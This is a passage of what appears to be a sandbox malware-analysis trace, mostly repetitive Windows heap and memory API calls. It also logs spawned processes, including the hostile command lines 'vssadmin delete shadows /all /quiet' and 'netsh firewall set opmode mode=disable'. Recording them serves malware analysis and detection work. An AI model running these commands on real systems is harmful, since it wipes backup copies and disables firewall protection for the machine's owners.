hHeap=0x150000, dwFlags=0x0, lpMem=0x173a00 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173a20 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173a40 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173a60 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173a80 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173aa0 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173ac0 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173ae0 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173b00 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173b20 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173b40 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173b60 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173b80 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173ba0 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173bc0 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173be0 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173c00 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173c20 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173c40 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173c60 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173c80 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173ca0 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173cc0 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173ce0 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173d00 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173d20 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173d40 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.842] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173d60 | out: hHeap=0x150000) returned 1 [0173.842] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173d80 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173da0 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173dc0 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173de0 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173e00 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173e20 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173e40 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173e60 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173e80 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173ea0 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173ec0 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173ee0 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173f00 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173f20 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173f40 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173f60 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173f80 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173fe0 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174000 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174020 | out: hHeap=0x150000) returned 1 [0173.843] GetProcessHeap () returned 0x150000 [0173.843] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174040 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174060 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174080 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1740a0 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1740c0 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1740e0 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174100 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174120 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174140 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174160 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174180 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1741a0 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1741c0 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1741e0 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174200 | out: hHeap=0x150000) returned 1 [0173.844] GetProcessHeap () returned 0x150000 [0173.844] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x174220 | out: hHeap=0x150000) returned 1 [0173.844] exit (_Code=0) Thread: id = 142 os_tid = 0x788 Thread: id = 143 os_tid = 0x5fc Thread: id = 144 os_tid = 0x55c Thread: id = 145 os_tid = 0x31c Thread: id = 146 os_tid = 0x7c8 [0169.160] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x1ab010 [0169.160] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x1d5e00 [0169.160] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x190580 [0169.161] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x1de9e0 [0169.161] LocalReAlloc (hMem=0x190580, uBytes=0x20, uFlags=0x2) returned 0x1af3d0 [0172.089] LocalFree (hMem=0x1ab010) returned 0x0 [0172.507] LocalFree (hMem=0x1de9e0) returned 0x0 [0172.507] LocalFree (hMem=0x1af3d0) returned 0x0 [0172.507] LocalFree (hMem=0x1d5e00) returned 0x0 Process: id = "20" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x1577d000" os_pid = "0x328" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x698" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 114 os_tid = 0x5bc Thread: id = 115 os_tid = 0x7f0 Thread: id = 116 os_tid = 0x334 Thread: id = 117 os_tid = 0x330 Thread: id = 118 os_tid = 0x5e4 Process: id = "21" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x161fa000" os_pid = "0x5c0" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0x328" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0002c05a" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 119 os_tid = 0x670 Thread: id = 120 os_tid = 0x674 Thread: id = 121 os_tid = 0x574 Thread: id = 122 os_tid = 0x54c [0125.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xd1dda0 | out: lpSystemTimeAsFileTime=0xd1dda0*(dwLowDateTime=0x520fcd10, dwHighDateTime=0x1d4f12b)) [0125.904] GetCurrentProcessId () returned 0x5c0 [0125.904] GetCurrentThreadId () returned 0x54c [0125.904] GetTickCount () returned 0xb23e [0125.904] QueryPerformanceCounter (in: lpPerformanceCount=0xd1dda8 | out: lpPerformanceCount=0xd1dda8*=9023031380) returned 1 [0125.905] malloc (_Size=0x100) returned 0x508e80 Thread: id = 123 os_tid = 0x368 Thread: id = 124 os_tid = 0x364 Thread: id = 125 os_tid = 0x7ec Thread: id = 132 os_tid = 0x710 Thread: id = 147 os_tid = 0x64 Thread: id = 222 os_tid = 0x5cc Process: id = "22" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x169ff000" os_pid = "0x668" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "21" os_parent_pid = "0x5c0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0002c49b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 126 os_tid = 0x5a4 Thread: id = 127 os_tid = 0x550 Thread: id = 128 os_tid = 0x708 Thread: id = 129 os_tid = 0x648 Thread: id = 130 os_tid = 0x634 Thread: id = 131 os_tid = 0x360 Thread: id = 148 os_tid = 0x6f4 Process: id = "23" image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x5f42a000" os_pid = "0x4fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x69c" cmd_line = "netsh firewall set opmode mode=disable" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 149 os_tid = 0x560 [0173.926] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efef0 | out: lpSystemTimeAsFileTime=0x1efef0*(dwLowDateTime=0x6a679cd0, dwHighDateTime=0x1d4f12b)) [0173.926] GetCurrentProcessId () returned 0x4fc [0173.926] GetCurrentThreadId () returned 0x560 [0173.926] GetTickCount () returned 0x151c7 [0173.926] QueryPerformanceCounter (in: lpPerformanceCount=0x1efef8 | out: lpPerformanceCount=0x1efef8*=13825158366) returned 1 [0173.927] GetModuleHandleW (lpModuleName=0x0) returned 0xf10000 [0173.927] __set_app_type (_Type=0x1) [0173.927] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf1ad14) returned 0x0 [0173.927] __wgetmainargs (in: _Argc=0xf255c0, _Argv=0xf255d0, _Env=0xf255c8, _DoWildCard=0, _StartInfo=0xf255dc | out: _Argc=0xf255c0, _Argv=0xf255d0, _Env=0xf255c8) returned 0 [0173.928] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.928] GetModuleHandleW (lpModuleName=0x0) returned 0xf10000 [0173.928] _vsnwprintf (in: _Buffer=0xf27a40, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x1e7a48 | out: _Buffer="netsh>") returned 6 [0173.928] GetProcessHeap () returned 0x2d0000 [0173.928] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f26f0 [0173.928] GetProcessHeap () returned 0x2d0000 [0173.928] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2710 [0173.928] GetProcessHeap () returned 0x2d0000 [0173.928] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2730 [0173.928] GetProcessHeap () returned 0x2d0000 [0173.928] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2750 [0173.928] GetProcessHeap () returned 0x2d0000 [0173.928] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2770 [0173.928] GetProcessHeap () returned 0x2d0000 [0173.928] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2790 [0173.928] GetProcessHeap () returned 0x2d0000 [0173.928] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f27e0 [0173.928] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2800 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2820 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2840 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2860 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2880 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f28a0 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f28c0 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f28e0 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2900 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2920 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2940 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2960 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2980 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f29a0 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f29c0 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f29e0 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2a00 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2a20 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2a40 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2a60 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2a80 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2aa0 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2ac0 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2ae0 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2b00 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2b20 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.929] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2b40 [0173.929] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2b60 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2b80 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2ba0 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2bc0 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2be0 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2c00 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2c20 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2c40 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2c60 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2c80 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2ca0 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2cc0 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2ce0 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2d00 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2d20 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2d40 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2d60 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2d80 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2da0 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2dc0 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2de0 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2e00 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2e20 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2e40 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2e60 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2e80 [0173.930] GetProcessHeap () returned 0x2d0000 [0173.930] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2ea0 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2ec0 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2ee0 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2f00 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2f20 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2f40 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2f60 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2f80 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2fe0 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3000 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3020 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f3040 [0173.931] GetProcessHeap () returned 0x2d0000 [0173.931] RtlAllocateHeap 